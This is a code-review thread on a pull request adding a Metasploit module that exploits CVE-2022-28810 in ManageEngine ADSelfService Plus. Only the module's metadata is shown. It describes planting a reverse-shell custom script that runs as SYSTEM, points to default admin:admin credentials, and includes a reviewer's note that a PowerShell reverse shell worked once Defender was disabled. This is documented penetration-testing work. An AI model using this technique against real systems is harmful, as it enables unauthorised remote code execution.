modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb

```diff
@@ -0,0 +1,307 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine ADSelfService Plus Custom Script Execution',
+        'Description' => %q{
+          This module exploits the "custom script" feature of ADSelfService Plus. The
+          feature was removed in build 6122 as part of the patch for CVE-2022-28810.
+          For purposes of this module, a "custom script" is arbitrary operating system
+          command execution. As written, this module uses `cmd.exe` to execute `jjs.exe`
+          and retrieve a reverse shell.
+
+          This module uses an attacker provided "admin" account to insert the malicious
+          payload into the custom script fields. When a user resets their password or
+          unlocks their account, the payload in the custom script will be executed.
+          The payload will be executed as SYSTEM if ADSelfService Plus is installed as
+          a service, which we believe is the normal operational behavior.
+
+          This is a passive module because user interaction is required to trigger the
+          payload. This module also does not automatically remove the malicious code from
+          the remote target. Use the "TARGET_RESET" operation to remove the malicious
+          custom script when you are done.
+
+          ADSelfService Plus uses default credentials of "admin":"admin"
+        },
+        'Author' => [
+          # Discovered and exploited by unknown threat actors
+          'Jake Baines', # Analysis, CVE credit, and Metasploit module
+          'Hernan Diaz', # Analysis and CVE credit
+          'Andrew Iwamaye', # Analysis and CVE credit
+          'Dan Kelley' # Analysis and CVE credit
+        ],
+        'References' => [
+          ['CVE', '2022-28810'],
+          ['URL', 'https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html'],
+          ['URL', 'https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/']
+        ],
+        'DisclosureDate' => '2022-04-09',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => ARCH_CMD,
+        'Privileged' => true, # false if ADSelfService Plus is not run as a service
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Targets' => [
+          [
+            'jjs.exe in memory',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :jjs_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/jjs_reverse_tcp'
+              }
+            }
```

Comment:
A few thoughts on this. First the I'm not sure the `'Type' => :jjs_cmd` is necessary. Presumably it's to ensure that only the `cmd/windows/jjs_reverse_tcp` payload is used but it's not defined in that module as a type and I don't think it needs to be?

The new payload is a great addition, and it's use in this module as the default makes a lot of sense. However, it doesn't look like this module necessarily needs to be limited to only that payload. I was able to confirm this by testing the `cmd/windows/powershell_reverse_tcp` payload which worked just fine once Defender's Real-Time protection was disabled.

```suggestion
            'Windows Command',
            {
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/jjs_reverse_tcp'
              }
            }
```